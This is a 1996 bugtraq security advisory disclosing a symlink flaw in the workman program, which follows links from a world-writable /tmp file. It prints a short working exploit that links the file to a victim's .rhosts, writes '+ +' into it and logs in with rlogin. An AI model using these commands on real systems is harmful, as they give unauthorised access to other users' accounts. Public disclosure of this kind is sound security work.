[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    r00t advisory -- workman vunerability
From:       Gregory Hull <gahull () ccs ! neu ! edu>
Date:       1996-08-26 12:21:15
[Download RAW message or body]

r00t advisory                                           [ workman       ]
                                                        [ Aug 25 1996   ]

-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user

-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.

r00t -- http://www.r00t.org

[prev in list] [next in list] [prev in thread] [next in thread]